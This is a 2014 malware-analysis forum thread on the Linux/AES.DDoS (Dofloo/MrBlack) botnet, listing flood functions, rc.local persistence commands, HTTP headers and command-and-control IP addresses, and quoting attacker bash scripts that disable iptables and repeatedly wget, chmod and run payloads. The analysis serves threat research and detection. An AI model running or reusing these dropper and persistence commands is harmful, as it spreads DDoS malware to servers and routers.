A forum for reverse engineering, OS internals and malware analysis 

Linux/AES.DDoS (alias Dofloo, MrBlack)

Forum for analysis and discussion about malware.

Re: Linux/AES.DDoS

 #24054  by unixfreaxjp
 Sun Oct 05, 2014 11:16 am
Same source provides this 4MB+ flooder (AES.DDoS full version) https://www.virustotal.com/en/file/fdde ... 412505809/
Image
Attack ffrom China address was recorded well. PoC of cyber crime:
Image
AES chiper PoC
Code: Select all
AES::AES(uchar *)
AES::~AES(void)
AES::Cipher(uchar *)
AES::InvCipher(uchar *)
AES::Cipher(void *,int)
AES::InvCipher(void *,int)
AES::KeyExpansion(uchar *,uchar *[3][3])
AES::FFmul(uchar,uchar)
AES::SubBytes(uchar *[3])
AES::ShiftRows(uchar *[3])
AES::MixColumns(uchar *[3])
AES::AddRoundKey(uchar *[3],uchar *[3])
AES::InvSubBytes(uchar *[3])
AES::InvShiftRows(uchar *[3])
AES::InvMixColumns(uchar *[3])
Flooder:
Code: Select all
DNS_Flood1(void *)
DNS_Flood2(void *)
DNS_Flood3(void *)
DNS_Flood4(void *)
SYN_Flood(void *) 
LSYN_Flood(void *)
UDP_Flood(void *) 
UDPS_Flood(void *)
TCP_Flood(void *) 
CC_Flood(void *)  
CC2_Flood(void *) 
CC3_Flood(void *)

2 pattern user-agents
Code: Select all
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)
Accept: text/html, */*
HTTP/1.1
daemon startup NOT xinetd but rc.local base:
Code: Select all
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
CNC (IP basis)
Code: Select all
222.186.34.152:48080
ASN: 23650 | 222.186.34.0/23 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
thx @wirehack7
Attachments
7z/infected
(303.42 KiB) Downloaded 65 times

Re: Linux/AES.DDoS (ARM + MIPS)

 #24055  by unixfreaxjp
 Sun Oct 05, 2014 11:46 am
Image
https://www.virustotal.com/en/file/42fe ... 412509775/
https://www.virustotal.com/en/file/dfe4 ... 412509784/
↑As per shown in the filename, MIPS and ARM version of Linux/AES.DDoS variant.
This version for ARM/MIPS only has TCP, CC, CC2 and CC3 attack variations.
The download hits was incredibly high despites of the fact it was just being uploaded < a warning!

Attack logs from an IP in China:
Image
CNC is in IP base same as http://www.kernelmode.info/forum/viewto ... =10#p24054 or http://www.kernelmode.info/forum/viewto ... 483#p24053
Code: Select all
222.186.34.152 | 23650 | 222.186.34.0/23 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
Noted these installation for autostart:
Code: Select all
sed -i -e '/$/d' /etc/rc.local
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
Thx wireshark for samples | #MMD!
Attachments
7z/infected
(641.85 KiB) Downloaded 62 times

Re: Linux/AES.DDoS

 #24067  by unixfreaxjp
 Tue Oct 07, 2014 12:53 am
MIPS version of AES.DDoS from different sources, worth to write a bit:
https://www.virustotal.com/en/file/74f9 ... 412642201/
https://www.virustotal.com/en/file/9550 ... 412644091/
Compiled with
Code: Select all
GCC: (Sourcery CodeBench 2014.05-6) 4.8.3 20140320 (prerelease)
With sources:
Code: Select all
 AES.cpp
 main.cpp
Autostart install:
Code: Select all
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/$/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
Typical:
Code: Select all
Unknown
VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%s
Hacker
VERSONEX:Linux-%s-mips|%d|%d MHz|%dMB|%dMB|%s
AES:
Code: Select all
J^X3AES
AES.cpp
_ZN3AESC2EPh
_ZN3AES9InvCipherEPvi
_ZN3AESD2Ev
_ZN3AESC1EPh
_ZTI3AES
_ZN3AES11InvSubBytesEPA4_h
_ZN3AES5FFmulEhh
_ZN3AES13InvMixColumnsEPA4_h
_ZN3AES8SubBytesEPA4_h
_ZN3AESD1Ev
_ZN3AES10MixColumnsEPA4_h
_ZN3AES9ShiftRowsEPA4_h
_ZN3AES12InvShiftRowsEPA4_h
_ZN3AESD0Ev
_ZTV3AES
_ZN3AES9InvCipherEPh
_ZN3AES11AddRoundKeyEPA4_hS1_
_ZN3AES6CipherEPvi
_ZN3AES12KeyExpansionEPhPA4_A4_h
_ZTS3AES
_ZN3AES6CipherEPh
HTTP header used:
Code: Select all
// method:
GET 
 HTTP/1.1
// pattern #1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host:
Connection: Keep-Alive
// pattern #2:
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: 
Connection: Keep-Alive
Pragma: no-cache
CNC (ip basis)
Code: Select all
218.244.148.150||37963 | 218.244.128.0/19 | CNNIC-ALIBABA-CN-NET | CN | - | HICHINA TELECOM NET
Attachments
7z/infected
(351.68 KiB) Downloaded 53 times

Re: Linux/AES.DDoS

 #24112  by unixfreaxjp
 Thu Oct 09, 2014 1:35 pm
These samples are obviously aiming routers, see the "WRT" used as file name:
Image
thanks benkow for attack report
https://www.virustotal.com/en/file/d10b ... 412861105/
https://www.virustotal.com/en/file/fa2c ... 412861136/
https://www.virustotal.com/en/file/c702 ... 412861169/
CNC:
Code: Select all
124.173.118.167
Loc: 124.173.118.167||4134 | 124.172.0.0/15 | CHINANET | CN | SZGWBN.NET.CN | WORLD CROSSING TELECOM (GUANGZHOU) LTD.
Attachments
7z/infected
(941.24 KiB) Downloaded 59 times

Re: Linux/AES.DDoS

 #24196  by unixfreaxjp
 Thu Oct 23, 2014 2:35 pm
New one (uploaded 3days ago with 20+ hits) for x32, with the unchanged details as: http://www.kernelmode.info/forum/viewto ... 483#p23869
Weaponized with the flood function as per : http://www.kernelmode.info/forum/viewto ... 483#p23959
Panel:
Image
VT: https://www.virustotal.com/en/file/da1e ... 414072434/
CNC PoC:
Code: Select all
connect(1, {sa_family=AF_INET, sin_port=htons(48080), sin_addr=inet_addr("116.255.162.80")}, 16
TCP mmdbangsjerks.malwaremustdie.org:52434->116.255.162.80:48080 (ESTABLISHED)
Connection to 116.255.162.80 48080 port [tcp/*] succeeded!
^C
$ date
Thu Oct 23 23:34:00 JST 2014
CNC Location:
Code: Select all
116.255.162.80||37943 | 116.255.128.0/17 | CNNIC | CN | - | ZHENGZHOU GIANT COMPUTER NETWORK TECHNOLOGY CO. LTD
Attachments
7z/infected
(639.38 KiB) Downloaded 56 times

Re: Linux/AES.DDoS

 #24213  by unixfreaxjp
 Sat Oct 25, 2014 8:50 am
A serious amount of infection script and ELF malware spotted in a panel.
Image
The scripts were used to disarmed the firewall and as cascade downloading & executing ALL of ELF AES.DDoS malware served in this panels, snips:
Code: Select all
#!/bin/bash
iptables -F 
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/xcc*
cd /tmp/;wget http://xxxxx/xcc1;chmod a+x xcc1;./xcc1
if [ $? -eq 0 ];then

else
  
while true

do
    ps | grep xcc* | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 60
   else 
    cd /tmp/;wget http://xxxxx/xcc1;chmod a+x xcc1;./xcc1
   fi
    ps | grep script.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 60
   else
cd /tmp;wget http://xxxxx/script.sh ; chmod a+x script.sh;./script.sh
   fi 
done
and..
Code: Select all
#!/bin/bash
iptables -F 
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/xcc*
while true

do
    ps | grep xcc* | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 60
   else 
    cd /tmp/;wget http://xxxxx/xcc2;chmod a+x xcc2;./xcc2
   fi
    ps | grep script1.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 60
   else
cd /tmp;wget http://xxxxx/script1.sh ; chmod a+x script1.sh;sh script1.sh
   fi 
done
..and so on..
Samples are below, leads to multiple CNC as per written in VT
https://www.virustotal.com/en/file/8468 ... 414221880/
https://www.virustotal.com/en/file/e5f4 ... 414225695/
https://www.virustotal.com/en/file/da1e ... 414225854/
https://www.virustotal.com/en/file/da1e ... 414225854/
https://www.virustotal.com/en/file/575f ... 414226374/
Reported credit: wirehack7
DISCLAIMER:
This is the MalwareMustDie ELF team work, posted ONLY in kernelmode as repository, it is shared to the community, don't use this information for publishment withourt mentioning to MMD or KM.
All of data is bound to: http://blog.malwaremustdie.org/p/the-ru ... es-we.html
Attachments
7z/infected
(1.77 MiB) Downloaded 59 times

Re: Linux/AES.DDoS

 #24216  by unixfreaxjp
 Sat Oct 25, 2014 2:52 pm
A new and big deal of payloads isn't it? ↓ (thx: shibumi)
All of these are AES.DDoS compiled in multi architecture. Intel, MIPS & ARM
Image
The xx ones are a copy of the "other" types so only 5 unique samples:
https://www.virustotal.com/en/file/0df5 ... 414244976/
https://www.virustotal.com/en/file/d6a8 ... 414245012/
https://www.virustotal.com/en/file/d9cf ... 414245153/
https://www.virustotal.com/en/file/52e8 ... 414245179/
https://www.virustotal.com/en/file/86c0 ... 414245203/
As re reversed, this ELFs will soon firing up ddos as soon as executed, you can not stop it (easily), so don't do that.
CNC are the same, and all lead to United States of America network :o
Code: Select all
Cracked: sa_family=AF_INET, sin_port=htons(48080), sin_addr=inet_addr("104.194.25.172")
PoC: TCP ifuckddos.malwaremustdie.org:43063->104.194.25.172:48080 (ESTABLISHED)
104.194.25.172||36114 | 104.194.0.0/19 | VERSAWEB-ASN | US | VERSAWEB.COM | VERSAWEB LLC
The detection ratio is very good, thank you for paying attention folks!
Attachments
7/infected
(1.76 MiB) Downloaded 58 times
 Return to “Malware”